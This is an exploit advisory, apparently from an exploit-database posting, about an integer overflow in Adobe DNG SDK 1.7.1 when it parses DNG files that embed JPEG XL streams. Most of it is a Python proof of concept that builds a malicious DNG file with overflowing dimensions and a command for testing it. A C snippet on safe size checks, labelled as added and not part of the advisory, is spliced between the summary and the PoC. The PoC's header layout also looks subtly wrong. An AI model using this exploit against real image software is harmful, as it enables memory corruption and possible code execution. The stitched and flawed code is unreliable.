=============================================================================================================================================
| # Title : Adobe DNG SDK v 1.7.1 2410 Files Containing JPEG XL Streams Due to Improper Dimension Validation Integer Overflow |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://helpx.adobe.com/camera-raw/digital-negative.html |
=============================================================================================================================================
[+] Summary : A potential security issue may arise when processing DNG (Digital Negative) files that embed JPEG XL (JXL) compressed image streams if image dimensions are not properly validated before memory allocation.
In this scenario, specially crafted width and height values are embedded inside the JPEG XL stream and referenced within the DNG/TIFF structure. If a vulnerable decoder performs unchecked arithmetic operations (e.g., width × height) using 32-bit integers or without overflow protection, this may lead to:
  - Integer overflow
  - Incorrect memory allocation size
  - Heap corruption
  - Out-of-bounds memory writes
  - Application crash or potential code execution
The issue typically occurs when:
  - The parser trusts image metadata values.
  - Multiplication is performed without verifying against SIZE_MAX.
  - The allocated buffer size is smaller than the required pixel storage.
This type of vulnerability is common in image parsing libraries when handling untrusted media files and highlights the importance of strict bounds checking and safe arithmetic operations during image decoding.
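The checks the summary calls for, as an added C example (not code from this advisory or from the Adobe DNG SDK): the unchecked 32-bit product next to a size computation that validates by division before multiplying. The dimensions are the ones this advisory's PoC uses; MAX_PIXELS, the 3 bytes per pixel and both function names are assumptions made for the illustration.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed policy cap for this example, not an Adobe DNG SDK constant. */
#define MAX_PIXELS ((uint64_t)1 << 30)

/* Unsafe pattern: the product is computed in 32 bits and silently wraps. */
static uint32_t unchecked_bytes32(uint32_t w, uint32_t h, uint32_t bpp)
{
    return w * h * bpp;
}

/* Hardened pattern: test each factor by division before multiplying, so no
 * intermediate value can wrap. Returns false when the image is rejected. */
static bool checked_bytes(uint32_t w, uint32_t h, uint32_t bpp, size_t *out)
{
    if (w == 0 || h == 0 || bpp == 0)
        return false;
    if ((uint64_t)w > MAX_PIXELS / h)   /* w * h would exceed the pixel cap */
        return false;
    uint64_t pixels = (uint64_t)w * h;  /* safe: bounded by MAX_PIXELS */
    if (pixels > SIZE_MAX / bpp)        /* pixels * bpp must fit in size_t */
        return false;
    *out = (size_t)pixels * bpp;
    return true;
}

int main(void)
{
    /* Dimensions from the advisory's PoC; 3 bytes per pixel is assumed. */
    const uint32_t w = 1431655766u, h = 715827883u;
    size_t need = 0;
    printf("32-bit w*h       = %u\n", (unsigned)unchecked_bytes32(w, h, 1));
    printf("32-bit row (w*3) = %u\n", (unsigned)unchecked_bytes32(w, 1, 3));
    printf("checked accepted = %d\n", checked_bytes(w, h, 3, &need));
    if (checked_bytes(4000, 3000, 3, &need))
        printf("4000x3000x3      = %zu bytes\n", need);
    return 0;
}
```

The pixel cap matters on 64-bit builds, where the full product of these dimensions still fits in size_t and a SIZE_MAX test alone would accept it.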
[+] POC :
import struct


def create_malicious_jxl_stream():
    """
    Builds a minimal JXL header containing dimensions that cause an Overflow.
    Target dimensions: 1431655766 (Width) and 715827883 (Height).
    """
    signature = b'\xff\x0a'                # JPEG XL codestream signature
    width = struct.pack("<I", 1431655766)  # little-endian 32-bit width
    height = struct.pack("<I", 715827883)  # little-endian 32-bit height
    extra_data = b'\x00' * 100             # zero padding after the header
    return signature + width + height + extra_data


def generate_dng_exploit(filename="exploit_poc.dng"):
    print(f"[*] Creating malicious DNG file: {filename}")
    # TIFF header: "II" (little-endian) byte order, magic number 42
    header = struct.pack("<HH", 0x4949, 42)
    ifd_offset = struct.pack("<I", 8)         # first IFD follows the 8-byte header
    ifd_entries_count = struct.pack("<H", 3)  # three 12-byte IFD entries
    # Each entry: tag, field type (3 = SHORT, 4 = LONG), count, value
    tag_compression = struct.pack("<HHII", 259, 3, 1, 50007)  # Compression
    tag_width = struct.pack("<HHII", 256, 4, 1, 1431655766)   # ImageWidth
    # Stream starts after header (8) + entry count (2) + entries (12 * 3)
    # + next-IFD offset (4)
    data_offset = 8 + 2 + (12 * 3) + 4
    tag_strip_offsets = struct.pack("<HHII", 273, 4, 1, data_offset)  # StripOffsets
    next_ifd = struct.pack("<I", 0)           # 0 = no further IFDs
    jxl_data = create_malicious_jxl_stream()
    with open(filename, "wb") as f:
        f.write(header)
        f.write(ifd_offset)
        f.write(ifd_entries_count)
        f.write(tag_compression)
        f.write(tag_width)
        f.write(tag_strip_offsets)
        f.write(next_ifd)
        f.write(jxl_data)
    print(f"[+] Success! File saved. Use 'dng_validate {filename}' to test.")


if __name__ == "__main__":
    generate_dng_exploit()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================